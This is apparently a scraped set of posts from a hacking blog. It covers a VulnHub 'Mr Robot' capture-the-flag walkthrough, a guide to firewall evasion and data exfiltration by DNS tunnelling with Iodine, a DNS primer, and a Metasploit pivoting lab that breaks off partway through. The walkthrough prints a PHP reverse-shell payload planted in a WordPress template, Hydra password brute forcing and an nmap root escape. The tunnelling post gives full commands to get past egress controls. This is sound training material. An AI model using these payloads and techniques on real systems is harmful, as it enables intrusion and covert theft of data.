Mr Robot

Posted on January 11, 2025 by haxez

Hello Friend, thank you for coming to haxez. I love the show Mr Robot, it’s probably one of my all-time favorite shows (along with the X-Files and House). Not only is it a realistic hacking drama but it’s also a psychological thriller with some crazy moments. So, today we’re going to channel our inner hacktivist and join up with fsociety to bring down the global conglomerate that is Evil Corp. That’s right, we’re going to be hacking our way into the Mr Robot box on VulnHub created by Leon Johnson.

Mr Robot Set Up

In order to hack this box, you will first need to download it from VulnHub. Once the box has been downloaded you will then need to import it into your Virtual Machine Hypervisor software. I’m going to be using VirtualBox for this and it’s as simple as clicking ‘File > Import Appliance’ and then navigating to the file you downloaded. It may take a couple of minutes but once it’s done, power it up along with your hacking Virtual Machine.

Mr Robot VirtualBox Network Setup

Firstly, you want to check your Host Network Manager settings. This can be done in VirtualBox by ‘File > Host Network Manager’. Take a look at your network settings and make note of the IPv4 address.

Once you have the host network address, check that DHCP is enabled. Then, head to the network settings of both your hacking machine and your target machine. Check that both of the machines have Adapter 1 set to host only and that the name of the adapter is the same. If you want you can enable the second adapter on Kali and set it to NAT so that you still have internet access.

Finding Mr Robot

Hopefully, finding Mr Robot won’t be too difficult now that we have our network settings configured correctly. First, you can use a tool called netdiscover which can either passively detect online hosts or search for them by sending ARP requests. This can be quite noisy but I thought it was worth mentioning. We know the IP address of the host-only interface is 192.168.56.0 so let’s ask netdiscover to explore that range.

Netdiscover

sudo netdiscover -r 192.168.56.0/24
Currently scanning: Finished!   |   Screen View: Unique Hosts                                                                                                                                                                                                                                                       3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180                                                                                                                             _____________________________________________________________________________
IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
-----------------------------------------------------------------------------
192.168.56.1    0a:00:27:00:00:0b      1      60  Unknown vendor                                                                                                                           
192.168.56.100  08:00:27:71:14:50      1      60  PCS Systemtechnik GmbH                                                                                                                   192.168.56.101  08:00:27:db:36:79      1      60  PCS Systemtechnik GmbH

As you can see, three hosts respond. One is our default gateway with the IP address of 192.168.56.1 and one is our own machine and the other is the target machine. We will have to work out which one is which in a moment.

Ping Sweep

Our second method for finding the host is to perform a ping sweep against the network. As you can see from the terminal output below, it has found the same hosts. So we now know that the target host is either 192.168.56.100 or 192.168..56.101. Let’s perform some reconnaissance to figure out which is which.

┌──(kali㉿kali)-[~]
└─$ sudo nmap -sP 192.168.56.0/24
[sudo] password for kali: 
Starting Nmap 7.92 ( https://nmap.org ) at 2022-04-30 07:39 EDT
Nmap scan report for 192.168.56.1
Host is up (0.00015s latency).
MAC Address: 0A:00:27:00:00:0B (Unknown)
Nmap scan report for 192.168.56.100
Host is up (0.00036s latency).
MAC Address: 08:00:27:71:14:50 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.56.101
Host is up (0.00038s latency).
MAC Address: 08:00:27:DB:36:79 (Oracle VirtualBox virtual NIC)
Nmap done: 256 IP addresses (4 hosts up) scanned in 28.02 seconds

Mr Robot Reconnaissance

In order to work out which one our target is, we can perform a port scan on both IP addresses. The services listening on the IP addresses should tell us which one we need to attack. All I’m doing in the scan below is running a TCP scan against all ports. This is usually fairly quick and should give us everything we need. We could do far more complex scans but for now, let’s work out which box is which.

┌──(kali㉿kali)-[/media/sf_OneDrive/VulnHub/MrRobot/Tooloutput]
└─$ sudo nmap -sT -p0- 192.168.56.100 
Starting Nmap 7.92 ( https://nmap.org ) at 2022-04-30 08:00 EDT
Nmap scan report for 192.168.56.100
Host is up (0.00012s latency).
All 65536 scanned ports on 192.168.56.100 are in ignored states.
Not shown: 65536 filtered tcp ports (proto-unreach)
MAC Address: 08:00:27:71:14:50 (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 15.35 seconds

Not a lot going on here. This is probably my machine as there won’t be many services running.

┌──(kali㉿kali)-[/media/sf_OneDrive/VulnHub/MrRobot/Tooloutput]
└─$ sudo nmap -sT -p0- 192.168.56.101
Starting Nmap 7.92 ( https://nmap.org ) at 2022-04-30 08:01 EDT
Nmap scan report for 192.168.56.101
Host is up (0.0014s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT    STATE  SERVICE
22/tcp  closed ssh
80/tcp  open   http
443/tcp open   https
MAC Address: 08:00:27:DB:36:79 (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 125.66 seconds

As we have a closed SSH port and a web server listening on ports 80 and 443. That definitely isn’t my machine and is likely our target.

Exploring The Mr Robot Web Server

We know that ports 80 and 443 are open so let’s go check them out in our browser. Just grab the IP address and pop it in your browser with either HTTP:// or HTTPS:// at the beginning. The website emulates a Linux terminal with a number of options. Going through these options doesn’t appear to give us much but is pretty cool for immersion. I suggest going through them.

Busting Directories

Since the website didn’t offer us much that we could use to progress, it’s time to brute force its directories and files to see find we can find anything interesting. There are a number of tools out there that can do this but I’m going to keep it simple and use dirb. The output of dirb is quite significant so I will only include a small section here.

┌──(kali㉿kali)-[/media/sf_OneDrive/VulnHub/MrRobot/Tooloutput]
└─$ sudo dirb https://192.168.56.101                     
-----------------
DIRB v2.22    
By The Dark Raver
-----------------
START_TIME: Sat Apr 30 08:23:20 2022
URL_BASE: https://192.168.56.101/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612                                                          
---- Scanning URL: https://192.168.56.101/ ----
+ https://192.168.56.101/robots.txt (CODE:200|SIZE:41)
==> DIRECTORY: https://192.168.56.101/0/                                                                                                                                                                                                                                                                                                                                            ==> DIRECTORY: https://192.168.56.101/admin/                                                                                                                                                                                                                                                                                                                                      ==> DIRECTORY: https://192.168.56.101/audio/                                                                                                                                                                                                                                                                                                                                         ==> DIRECTORY: https://192.168.56.101/blog/                                                                                                                                                                                                                                                                                                                                           ==> DIRECTORY: https://192.168.56.101/css/                                                                                                                                                                                                                                                                                                                                             ==> DIRECTORY: https://192.168.56.101/feed/
==> DIRECTORY: https://192.168.56.101/wp-admin/
==> DIRECTORY: https://192.168.56.101/wp-admin/

Mr robots.txt

As can be seen from the output above, we have a number of interesting files and directories. The first file I want to look at is the robots.txt file. In essence, the robots.txt file is a file that tells search engines what not to index. If you have login pages on your website then you would include them in the robots.txt file to ensure they don’t get indexed by search engines. Let’s take a look at it at http://192.168.56.101/robots.txt

User-agent: *
fsocity.dic
key-1-of-3.txt

Mr Robot First Key

It looks like we have our first flag or key. Navigate to the http://192.168.56.101/key-1-of-3.txt file and you should receive the following key 073403c8a58a1f80d943455fb30724b9. It also appears that we have a dictionary file, perhaps a word list that we can use to attempt to gain access to the machine. Let’s check it out http://192.168.56.101/fsocity.dic. The file will automatically download but you can cat it once it has downloaded.

Admin Area

My suspicions were correct, it is a large wordlist. We could try and brute force SSH with it or the admin area of the website. Since we found it on the website I think we should start there. The first admin area found by dirb was https://192.168.56.101/admin but visiting that has a constant redirect loop on it. However, it also found a WordPress admin area.

Enumerating Valid Users

Interestingly, when attempting to login into the portal with admin: admin I am informed that I’m using an invalid username. This is a common tactic used in web application penetration testing to enumerate users. If the error messages for submitting an incorrect username and a correct username with an incorrect password are different, then we can enumerate the correct users. First, let’s sort out the wordlist so it only has unique entries.

┌──(kali㉿kali)-[/media/sf_OneDrive/VulnHub/MrRobot/Tooloutput]
└─$ sort /home/kali/Downloads/fsocity.dic | uniq > robodic.txt

Burp Suite

There are many different tools out there capable of brute-forcing web applications and Burp Suite is probably a bit overkill for this task. However, I know how to use Burp and find it really intuitive so I’m going to stick with what I know. With the proxy on, I will capture a login request and send it to the intruder. There I will clear the existing positions and add my own to the log parameter.

I will then load the fsociety.dic file into the payloads and start the attack Within a matter of moments we can see that the user Elliot has a different response length from the rest of the responses. This suggests that the error message being sent back is different from that of the rest of the users.

Within a matter of moments, we can see that the user Elliot has a different response length from the rest of the responses. This suggests that the error message being sent back is different from that of the rest of the users.

Hydra

The error message is different, as you can see it is saying that password for the user Elliot is incorrect. So now that we know our username, it’s time to find our password and in order to do that, we’re going to use a different tool called Hydra.

hydra -vV -l elliot -P robotdic.txt 192.168.56.101 http-post-form '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:F=is incorrect'
[ATTEMPT] target 192.168.56.101 - login "elliot" - pass "even" - 5656 of 11452 [child 9] 
[ATTEMPT] target 192.168.56.101 - login "elliot" - pass "Even" - 5657 of 11452 [child 7] 
[ATTEMPT] target 192.168.56.101 - login "elliot" - pass "evening" - 5658 of 11452 [child 11] 
[ATTEMPT] target 192.168.56.101 - login "elliot" - pass "event" - 5659 of 11452 [child 12] 
[ATTEMPT] target 192.168.56.101 - login "elliot" - pass "events" - 5660 of 11452 [child 5] 
[80][http-post-form] host: 192.168.56.101   login: elliot   password: ER28-0652
STATUS] attack finished for 192.168.56.101 (waiting for children to complete tests)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2022-04-30 09:58:12

Bingo we have found his password from the fsociety.dic file.

Popping Shells

Now we need to get on the box, the simplest way to do this is to add some code to one of the WordPress templates. The easiest is probably going to be the 404 templates because you can then call any non-existing page to execute the code. Modify the following code with your own IP address and add it to the top of the WordPress 404 template.

<?php
exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.56.102/443 0>&1'");
?>

Wordpress 404 Template — WordPress 404 Template

Now, in your terminal create a listener on port 443 using NetCat.

┌──(kali㉿kali)-[/media/sf_OneDrive/VulnHub/MrRobot/Tooloutput]
└─$ sudo nc -lvp 443       
listening on [any] 443 ...
connect to [192.168.56.102] from (UNKNOWN) [192.168.56.101] 37398
daemon@linux:/opt/bitnami/apps/wordpress/htdocs$ ls

Lateral Movement

Looking in the home directory we can see there is a user called ‘robot’. Furthermore, there are two files in this user’s home directory. One is the second key and the other is what appears to be a password md5. Unfortunately, we can’t read the key file due to the permissions but we can read the password file.

daemon@linux:/opt/bitnami/apps/wordpress/htdocs$ ls -laSh /home/robot
ls -laSh /home/robot
total 16K
drwxr-xr-x 2 root  root  4.0K Nov 13  2015 .
drwxr-xr-x 3 root  root  4.0K Nov 13  2015 ..
-rw-r--r-- 1 robot robot   39 Nov 13  2015 password.raw-md5
-r-------- 1 robot robot   33 Nov 13  2015 key-2-of-3.txt

If we cat this file we can see that is the md5 hash for the user robot. If we crack this hash then we should be able to switch to the robot user.

daemon@linux:/opt/bitnami/apps/wordpress/htdocs$ cat /home/robot/password.raw-md5
<pps/wordpress/htdocs$ cat /home/robot/password.raw-md5                     
robot:c3fcd3d76192e4007dfb496cca67e13b

Now, we could crack this hash using Hashcat or John The Ripper. However, it has likely already been cracked so let’s check out crackstation.net. Indeed the hash has already been cracked and the password is abcdefghijklmnopqrstuvwxyz… right.

TTY Shell

Trying to switch to ‘robot’ in our current shell will produce an error saying we need to be in a terminal. In order to resolve this issue, we need to spawn a TTY shell.

daemon@linux:/opt/bitnami/apps/wordpress/htdocs$ python -c 'import pty; pty.spawn("/bin/sh")'        
$ su robot
Password: abcdefghijklmnopqrstuvwxyz

Now that we have switched to ‘robot’ we can capture the key in our home directory.

robot@linux:/opt/bitnami/apps/wordpress/htdocs$ cat /home/robot/key-2-of-3.txt           822c73956184f694993bede3eb39f959

Privilege Escalation

In order to escalate our privileges to root, we need to find a program that can elevate us. This is normally possible due to a file having the suid bit set. You can find files with the suid bit set by running the following command.

robot@linux:/opt/bitnami/apps/wordpress/htdocs$ find / -perm /4000 -type f 2>/tmp/2                 
/bin/ping
/bin/umount
/bin/mount
/bin/ping6
/bin/su
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/sudo
/usr/local/bin/nmapPrivilege Escalation

We can see from the output that one of these files is Nmap and older versions of Nmap had an interactive mode that you could use to escape to root. As you can see from the tool output below, we can use Nmap interactive mode to escape to root and capture the final key.

robot@linux:~$ nmap –interactive
nmap –interactive
Starting nmap V. 3.81 ( http://www.insecure.org/nmap/ )
Welcome to Interactive Mode -- press h <enter> for help
nmap> !sh
!sh
# whoami
Whoami
root
# ls
Ls
key-2-of-3.txt  password.raw-md5
# cd /root
cd /root
# ls
Ls
firstboot_done  key-3-of-3.txt
# cat key-3-of-3.txt
cat key-3-of-3.txt
04787ddef27c3dee1ee161b21670b4e4

Firewall Evasion with DNS Tunneling

Posted on January 11, 2025 by haxez

Hello World and welcome to haxez. Today I want to talk about the DNS tunneling software Iodine. Or more specifically I want to talk about data exfiltration and firewall evasion via DNS encapsulation. If you haven’t read my article on DNS then I strongly recommend giving that a quick read-through beforehand.

Scenario

Envision a scenario where you’ve successfully socially engineered your way into a super-secret evil organization. You’ve bypassed physical security and have found a sneaky corner office with an ethernet port. You plug your laptop into the network and the DHCP server assigns you an IP address. Next, you compromise a host and attempt to ping your external Command and Control center (C2). You ping your domain name. The ping returns the correct IP address for your domain name but your pings all time out… what do you do?

Solution

Why would ping be able to resolve your domain names IP address but not be able to ping it? Other than the obvious ICMP packets being blocked, it could be that the network administrator has blocked all traffic except DNS. This is a common configuration to allow DNS resolution on the network, but fortunately, it is also susceptible to abuse. By using the DNS tunneling software Iodine, we can establish a tunnel to an external host and use it as a proxy to the internet.

Initial Set Up

In order to perform this type of attack, you will need an external server capable of running Iodine. Iodine should be compatible with most Linux distributions but for this demonstration, I’m going to be using a Debian-based cloud server. Furthermore, You will also need your own domain name and access to edit the DNS records for that domain. Finally, you will need a Linux machine to launch your attack. As you can see from the screenshot below, my IP address is currently set to 37.120.198.179 (it’s a VPN before you ask).

Pre Iodined What Is My IP DNS — Pre Iodined What Is My IP

Iodine DNS Configuration

For this demonstration, I’m going to be using my spare domain haxr.one. It is currently registered with google and is using their nameservers. I don’t use the domain for anything, I bought it on a whim and am now deciding to do something with it. In order for Iodine to work, we need to create some records so that the Iodine server and client can communicate. As you can see from the screenshot below, I have created an A record of dnstunip which points to my Debian server’s IP address of 185.132.43.9. I then create an NS (nameserver) record of dnstun and point it to the A record (dnstunip.haxr.one).

Iodine Server Configuration

On Debian, Iodine can be installed by simply running apt-get install iodine. That’s it, that’s all the installation you need to do unless Iodine isn’t found in the repositories. If that happens, you can clone it directory from the GitHub repository but they have documentation on how to do that. Once Iodine is installed you need to tell it to start listening for DNS queries for your domain. In order to do this, you need to run iodined (the server-side software). As you can see from the screenshot below I have started iodined and set the password of SecretPassword1337, the local IP address of 10.0.0.1, and the domain of dnstun.haxr.one. The local IP address is the IP address that the DNS tunnel is going to use to communicate with the client.

sudo iodined -f -c -P SecretPassword1337 10.0.0.1 dnstun.haxr.one

DNS Iodine Server Configuration — Iodine Server Configuration

You should now be able to check that your Iodine server is set up correctly by visiting https://code.kryo.se/iodine/check-it/ and popping in your domain name.

Iodine DNS Server Check — Iodine Server Check

Iodine Client Configuration

Once you have the server running, head back to your client and with sudo, run:

sudo iodine, -f -P SecretPassword1337 dnstun.haxr.one.

Where the password is your password and the dnstun.haxr.one is your domain. This will then send DNS queries to the server to determine whether it can communicate with it. The client and server will then determine the upstream and downstream configurations and finally create the tunnel. The client should now have a new network interface called dns0 or something similar. The IP address of that interface will be set to an IP within the range that you specified on the server (10.0.0.X). That’s it, you now have a connection to the server. You can SSH into it and communicate with the outside world.

It’s also worth launching Wireshark and watching the DNS traffic being sent and received. It is quite bizarre seeing the length of some of the requests and responses. You can see from the screenshot below that the DNS traffic isn’t normal. However, Wireshark doesn’t seem to think there is a problem with it and unless there are devices on the network configured to look for this type of traffic then it probably won’t get flagged.

Wireshark PCAP looking at DNS — Wireshark PCAP

The Cherry On Top

Ok, but what if you want to browse the internet while you have this DNS tunnel established? There’s an SSH trick for that. If you SSH to the DNS tunnel servers IP address (10.0.0.1) and specify a few arguments, you can dynamically port forward traffic to your localhost. This means that by setting a proxy configuration in your browser to localhost and the specified port, you can browse the web. The command is:

sudo ssh -N -D 9090 [email protected]

where 10.0.0.1 is the IP address of the server’s DNS tunnel IP and 9090 is the local port you want to forward to. The -N argument just means no command execution and the -D argument is the dynamic port forwarding flag that makes the magic happen.

Iodine Browser Configuration

Once that’s done, you can head to your browser’s proxy settings and manually configure a SOCKS proxy on the specified port. Save the changes and you should now be able to browse the web. As you can see from the screenshot below, I have created the SOCKS proxy and when visiting the what is my IP website, it tells me that my IP address is now the IP address of our Debian cloud server.

DNS Concerns

So why is this a problem? Well, it’s using DNS to exfiltrate data out of an otherwise restricted network. There are plenty of places such as banks, prisons, and other government facilities where internet access might be restricted for genuine reasons. These places do not want sensitive information to escape their network. Banks don’t want their client’s data stolen, prisons don’t want their inmates communicating with the outside world and governments don’t want their secrets leaked. Additionally, if a hacker were able to implant an easily concealed device into a network it could act as a backdoor into that network. This is also how some malware communicates back to the command and control center to receive instructions.

DNS Mitigations

How do you mitigate a service that is behaving as it is expected to? Well, there are actually a number of options. First, you could add domain allow and block lists to your configuration. By blocking known malicious domain names, you ensure that a DNS tunnel can’t be established to that domain name. However, a hacker could just register a new domain name and use that. A better approach is to use an allow list whereby only traffic from specific domains is allowed into the network.

An even better approach is to implement a device that performs traffic/packet inspection. There are a number of devices out there that will identify malicious DNS traffic and block it. You saw from the Wireshark screenshots that the DNS tunnel traffic stands out like a sore thumb. It is easily distinguishable from genuine DNS traffic.

DNS Conclusions

I thought this was a fantastic technique when I first come across it. A colleague/friend of mine recommend it to me while I was on an engagement and sure enough, it worked. I was shocked as I didn’t think it would be possible to encode data like that into DNS queries. You can have a full-blown conversation with another computer by smuggling it through DNS.

DNS Simplified

Posted on January 11, 2025 by haxez

Hello world, and welcome to haxez. Today I want to talk about the Domain Name System (DNS). I know, I know, most of you probably already know how DNS works. However, I’m going to be writing an article soon about Firewall Evasion and Data Exfiltration through DNS Tunnelling and I needed to brush up on my DNS knowledge. Never wanting to waste an opportunity, I thought it would make for a good blog post and video so here we are.

What is DNS?

Domain Name System or DNS is a hierarchical system for translating text to IP addresses. It relies on various nameservers at various levels. A nameserver is a server that holds records for domains whether they are top-level domains (TLD) or fully qualified domains (FQDN). At the very top of the hierarchy are the root servers. These root servers hold the DNS record information for the top-level domains. This information is stored in something called a zone file. You can perform a DNS zone transfer using various tools. The example below is using Nmap.

sudo nmap --script dns-zone-transfer.nse --script-args dns-zone-transfer.domain=zonetransfer.me -p53 nsztm1.digi.ninja

The zone file contains entries such as the nameservers for the top-level domains. Underneath the root nameservers are the top-level domain nameservers. The same principle applies here in that the top-level domain nameservers contain information about the fully qualified domain nameservers. At the bottom of the hierarchy is the domain’s authoritative nameservers which contain records such as A, MX, NS, TXT, and many others.

Domain Structure

If we look at the web address haxez.org we can see that it has multiple sections. You may not know about the first section as it doesn’t tend to be represented by anything. In some cases, it can be represented by a full stop but most Domain Name System nameservers don’t require the full stop in order for it to work. The full stop comes at the end of the ‘.ORG’ section and signifies a root nameserver. Root nameservers hold the IP addresses of the top-level domain (TLD) (COM, NET, ORG,) nameservers. The ‘ORG’ section of the address is a top-level domain. The ‘haxez’ portion of the address is the domain. Anything that comes before haxez.org would be a subdomain. For example, www.haxez.org where www is the subdomain, and haxez is the fully qualified domain.

How Does The DNS Work?

When you type a URL into your browser a number of things happen. Using various online resources I’ve broken it down into 10 steps. I’ve overly simplified the process but there is a lot more going on such as caching, virtual host magic, TCP handshakes, and GET requests.

The client queries the DNS resolver for the location of the domain name,
The DNS resolver queries a root nameserver for the location of the top-level domain (.COM, .ORG, .CO.UK, .NET) nameserver,
The root nameserver responds to the DNS resolver with the IP address of the top level domain nameserver,
The DNS resolver then queries the top level domain nameserver for the location of the domain’s authoritative nameserver,
The top-level domain nameserver tells the DNS resolver the IP address of the authoritative nameserver.
The DNS Resolver then queries the authoritative nameserver for the IP address of the domain.
The authoritative nameserver tells the DNS resolver the IP address of the domain,
The DNS resolver responds back to the client with the IP address of the domain,
The client then sends the request to the target IP address,
The target IP address would then respond with the information the client requested.

DNS Demonstration

Let’s start at the top! using the tool nslookup we can query the root nameservers. We simply set the type of query to the nameserver and then use a full stop to specify the root servers. As you can see from the output below, nslookup returns all the root server nameservers.

┌─[joe@Parrot]─[~]
└──╼ $nslookup
> set type=ns
> .
Server:		192.168.0.1
Address:	192.168.0.1#53
Non-authoritative answer:
.	nameserver = c.root-servers.net.
.	nameserver = d.root-servers.net.
.	nameserver = e.root-servers.net.
.	nameserver = f.root-servers.net.
.	nameserver = g.root-servers.net.
.	nameserver = h.root-servers.net.
.	nameserver = i.root-servers.net.
.	nameserver = j.root-servers.net.
.	nameserver = k.root-servers.net.
.	nameserver = l.root-servers.net.
.	nameserver = m.root-servers.net.
.	nameserver = a.root-servers.net.
.	nameserver = b.root-servers.net.
Authoritative answers can be found from:

In order to query the root server nameservers, we need to find out what their IP addresses are. In order to do that we set the query type to an A record. An A record translates a word to an IP address.

> set type=a
> a.root-servers.net
Server:		192.168.0.1
Address:	192.168.0.1#53
Non-authoritative answer:
Name:	a.root-servers.net
Address: 198.41.0.4

Next, we need to find the nameservers of the top-level domain. In order to do that, we first set our server to the IP address that we just obtained from our A record query. Next, we set the record type to the nameserver and then query the “.COM” top-level domain. However, ensure you put a full stop after it.

> server 198.41.0.4
Default server: 198.41.0.4
Address: 198.41.0.4#53
> set type=ns
> com.
;; Truncated, retrying in TCP mode.
Server:		198.41.0.4
Address:	198.41.0.4#53
Non-authoritative answer:
*** Can't find com.: No answer
Authoritative answers can be found from:
com	nameserver = e.gtld-servers.net.
com	nameserver = b.gtld-servers.net.
com	nameserver = j.gtld-servers.net.
com	nameserver = m.gtld-servers.net.
com	nameserver = i.gtld-servers.net.
com	nameserver = f.gtld-servers.net.
com	nameserver = a.gtld-servers.net.
com	nameserver = g.gtld-servers.net.
com	nameserver = h.gtld-servers.net.
com	nameserver = l.gtld-servers.net.
com	nameserver = k.gtld-servers.net.
com	nameserver = c.gtld-servers.net.
com	nameserver = d.gtld-servers.net.
e.gtld-servers.net	internet address = 192.12.94.30
e.gtld-servers.net	has AAAA address 2001:502:1ca1::30
b.gtld-servers.net	internet address = 192.33.14.30
b.gtld-servers.net	has AAAA address 2001:503:231d::2:30
j.gtld-servers.net	internet address = 192.48.79.30
j.gtld-servers.net	has AAAA address 2001:502:7094::30
m.gtld-servers.net	internet address = 192.55.83.30
m.gtld-servers.net	has AAAA address 2001:501:b1f9::30
i.gtld-servers.net	internet address = 192.43.172.30
i.gtld-servers.net	has AAAA address 2001:503:39c1::30
f.gtld-servers.net	internet address = 192.35.51.30
f.gtld-servers.net	has AAAA address 2001:503:d414::30
a.gtld-servers.net	internet address = 192.5.6.30
a.gtld-servers.net	has AAAA address 2001:503:a83e::2:30
g.gtld-servers.net	internet address = 192.42.93.30
g.gtld-servers.net	has AAAA address 2001:503:eea3::30
h.gtld-servers.net	internet address = 192.54.112.30
h.gtld-servers.net	has AAAA address 2001:502:8cc::30
l.gtld-servers.net	internet address = 192.41.162.30
l.gtld-servers.net	has AAAA address 2001:500:d937::30
k.gtld-servers.net	internet address = 192.52.178.30
k.gtld-servers.net	has AAAA address 2001:503:d2d::30
c.gtld-servers.net	internet address = 192.26.92.30
c.gtld-servers.net	has AAAA address 2001:503:83eb::30
d.gtld-servers.net	internet address = 192.31.80.30
d.gtld-servers.net	has AAAA address 2001:500:856e::30

We get a lot of results but we should be able to set any of these to our DNS resolver in order to query it for a specific domain nameserver. Set the server to one of the IP addresses listed above and then set the type to nameserver again. Then, choose a domain and punch It in to find its nameservers.

> server 192.5.6.30
Default server: 192.5.6.30
Address: 192.5.6.30#53
> set type=ns
> google.com.
Server:		192.5.6.30
Address:	192.5.6.30#53
Non-authoritative answer:
*** Can't find google.com.: No answer
Authoritative answers can be found from:
google.com	nameserver = ns2.google.com.
google.com	nameserver = ns1.google.com.
google.com	nameserver = ns3.google.com.
google.com	nameserver = ns4.google.com.
ns2.google.com	has AAAA address 2001:4860:4802:34::a
ns2.google.com	internet address = 216.239.34.10
ns1.google.com	has AAAA address 2001:4860:4802:32::a
ns1.google.com	internet address = 216.239.32.10
ns3.google.com	has AAAA address 2001:4860:4802:36::a
ns3.google.com	internet address = 216.239.36.10
ns4.google.com	has AAAA address 2001:4860:4802:38::a
ns4.google.com	internet address = 216.239.38.10

Finally, we can now set our DNS resolver to one of googles nameservers and query it to find A records such as mail. This could of course be scripted to automatically run through each of these steps automatically and perform a subdomain brute force attack against the servers. I believe there is already a tool called Fierce that does exactly that.

> server 216.239.32.10
Default server: 216.239.32.10
Address: 216.239.32.10#53
> set type=a
> mail.google.com.
Server:		216.239.32.10
Address:	216.239.32.10#53
Name:	mail.google.com
Address: 142.250.178.5

Conclusion

I know this isn’t hacking but it’s essential to have a good understanding of the technologies that make the internet and the world wide web possible. There is a lot more to DNS than I’ve covered here. I haven’t discussed the various record types like MX, TXT, and CNAME that can be added to a zone file. I haven’t talked about propagation and caching.

DNS is such as fascinating subject to study because the problem is always DNS. Joking aside, without DNS we would have to remember the IP addresses of every website we wanted to visit. Oh, and those root servers at the top of the tree, if they go down then so does the internet. No more name resolution means anything that has been developed with resources being pulled via domain names will no longer work. It’s a terrifying prospect, especially with all the recent talk of cyber armageddon from the World Economic Forum. If someone with a zero-day were to get into those root servers and mess up the zone files then it would cause chaos. Hopefully, there is some hidden redundancy and backups to mitigate that possibility. Those 13 nameservers are the unsung heroes of the internet and to them I say, thank you. Keep computing away you absolute legends.

Metasploit Pivoting To Hack Segregated Machines

Posted on January 11, 2025 by haxez

Hello world, welcome to haxez. If you’re new to hacking and cybersecurity then you may have heard about pivoting. If you haven’t then let me explain. Pivoting is where you have compromised a host and discovered it is attached to another network. You then use that host to pivot your scans and attacks to hosts within that other network. For example, imagine you have just compromised a public-facing Web Application server. You check the network configuration and find that it is connected to an internal network. You can then use the compromised web application server to scan that internal network.

Pivoting Labs

I have seen some labs that allow you to practice pivoting but frankly not that many. Some require a complex setup process and others require paying a setup fee in order to access them. Then I had a light bulb moment. I’ve googled around and I haven’t seen many articles relating to using VirtualBox. VirtualBox has a number of network adaptor settings. One of these settings is a Host Only adapter. You can have multiple Virtual Machines configured to use this host-only adapter. You can also create multiple host-only adapters. My idea (I’m sure many others have had it) was to set up a lab in the following configuration.

Kali VM on the host only adapter 1.
Vulnerable VM 1 on the host only adapters 1 and 2.
Vulnerable VM 2 on the host only adapter 2.

The Kali VM wouldn’t be able to reach Vulnerable VM 2 unless it has exploited and is pivoting through Vulnerable VM 1.

Lab Set Up

Let’s get to work, first I downloaded Metasploitable 2. I created a new virtual machine and called it Meta1. I then cloned that virtual machine and called it Meta2.

Pivoting — Clone Virtual Machine — **Pivoting** — Clone Virtual Machine

Next, I used the host network manager to create a new host-only adapter.

Pivoting — Creating New Host-Only Adapter — **Pivoting** — Creating New Host-Only Adapter

After that, I configured the first network adapter on Meta1 to the first host-only adapter. Then I enabled and configured the second network adapter on Meta1 to the second host-only adapter. Finally, I configured the first network adapter on Meta2 to the second host-only adapter. I also made sure that my Kali Linux VM had its network set to the first host-only adapter.

Host Configuration

I booted Meta1 and logged in (msfadmin|msfadmin) and noticed that it only had one interface up (eth0). In its current condition, it won’t be able to talk to the second network and thus the second target. To rectify this, I had a quick google search and found this page in the Ubuntu documentation. The configuring interface section explains how to bring up an interface using DHCP.

sudo ip link set dev eth1 down
sudo dhclient eth1

Testing Pivoting

Now for the moment of truth, does this allow me to pivot from Meta1 to Meta2. First, we need to find the IP address of the host on the same network as us. You can do this by running ifconfig on the host or the proper way by performing a Nmap scan. Great, our host is online and has the IP address 192.168.56.106.

┌──(kali㉿kali)-[~]
└─$ sudo nmap -sP 192.168.56.0/24
[sudo] password for kali: 
Starting Nmap 7.92 ( https://nmap.org ) at 2022-05-10 13:51 EDT
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
Nmap scan report for 192.168.56.1
Host is up (0.00028s latency).
MAC Address: 0A:00:27:00:00:0B (Unknown)
Nmap scan report for 192.168.56.100
Host is up (0.00013s latency).
MAC Address: 08:00:27:DE:8C:96 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.56.106
Host is up (0.00025s latency).
MAC Address: 08:00:27:82:70:32 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.56.102
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 2.05 seconds

Next, I needed a way to establish a connection to the host which would allow quick and easy set up of a pivot. Let’s launch Metasploit.

Metasploit

For simplicity, I chose the ssh_login module and configured it with the remote host’s IP address and the username and password.

msf6 auxiliary(scanner/ssh/ssh_login) > options
Module options (auxiliary/scanner/ssh/ssh_login):
   Name              Current Setting  Required  Description
   ----              ---------------  --------  -----------
   BLANK_PASSWORDS   false            no        
   BRUTEFORCE_SPEED  5                yes       
   DB_ALL_CREDS      false            no        
   DB_ALL_PASS       false            no        
   DB_ALL_USERS      false            no        
   DB_SKIP_EXISTING  none             no        
   PASSWORD          msfadmin         no        
   PASS_FILE                          no        
   RHOSTS            192.168.56.106   yes       
   RPORT             22               yes       
   STOP_ON_SUCCESS   false            yes       
   THREADS           1                yes       
   USERNAME          msfadmin         no       
   USERPASS_FILE                      no        
   USER_AS_PASS      false            no        
   USER_FILE                          no        
   VERBOSE           false            yes

I then ran the exploit command and waited for it to complete. Great, we have established a connection to our host but now we need to upgrade it to a Meterpreter shell. In order to do this, I first figured out what session it was using the session command.

msf6 auxiliary(scanner/ssh/ssh_login) > sessions -l
Active sessions
===============
  Id  Name  Type         Information  Connection
  --  ----  ----         -----------  ----------
  1         shell linux  SSH root @   192.168.56.102:44505 -> 192.168.56.106:22 (192.168.56.106)
  3         shell linux  SSH root @   192.168.56.102:41553 -> 192.168.56.106:22 (192.168.56.106)

Next, I instructed Metasploit to upgrade the session to a Meterpreter session.

msf6 auxiliary(scanner/ssh/ssh_login) > sessions -u 3
[*] Executing 'post/multi/manage/shell_to_meterpreter' on session(s): [3]
